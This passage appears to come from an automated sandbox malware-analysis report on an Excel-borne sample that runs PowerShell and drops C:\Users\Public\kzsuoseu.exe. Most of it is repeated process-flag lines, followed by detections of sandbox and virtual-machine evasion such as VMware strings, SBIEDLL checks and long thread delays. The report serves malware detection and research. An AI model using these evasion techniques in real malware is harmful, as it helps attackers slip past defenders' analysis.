                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\kzsuoseu.exeProcess information set: NOOPENFILEERRORBOX
                Source: x2hGv.xlsStream path 'Workbook' entropy: 7.92744569275 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: kzsuoseu.exe, 0000001A.00000002.510895236.0000000003264000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.508505553.0000000003491000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\kzsuoseu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\kzsuoseu.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3762
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3999
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4304
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2230
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep count: 3762 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep count: 3999 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5400Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5008Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\conhost.exe TID: 5340Thread sleep count: 44 > 30
                Source: C:\Users\Public\kzsuoseu.exe TID: 4492Thread sleep count: 62 > 30
                Source: C:\Users\Public\kzsuoseu.exe TID: 5088Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\Public\kzsuoseu.exe TID: 5888Thread sleep count: 53 > 30
                Source: C:\Users\Public\kzsuoseu.exe TID: 6076Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\Public\kzsuoseu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\Public\kzsuoseu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                Source: C:\Users\Public\kzsuoseu.exeLast function: Thread delayed
                Source: powershell.exe, 00000016.00000002.496165200.0000022BEDD0D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln1
                Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: kzsuoseu.exe, 0000001C.00000002.508505553.0000000003491000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: powershell.exe, 00000016.00000002.493294610.0000022BEDB5B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
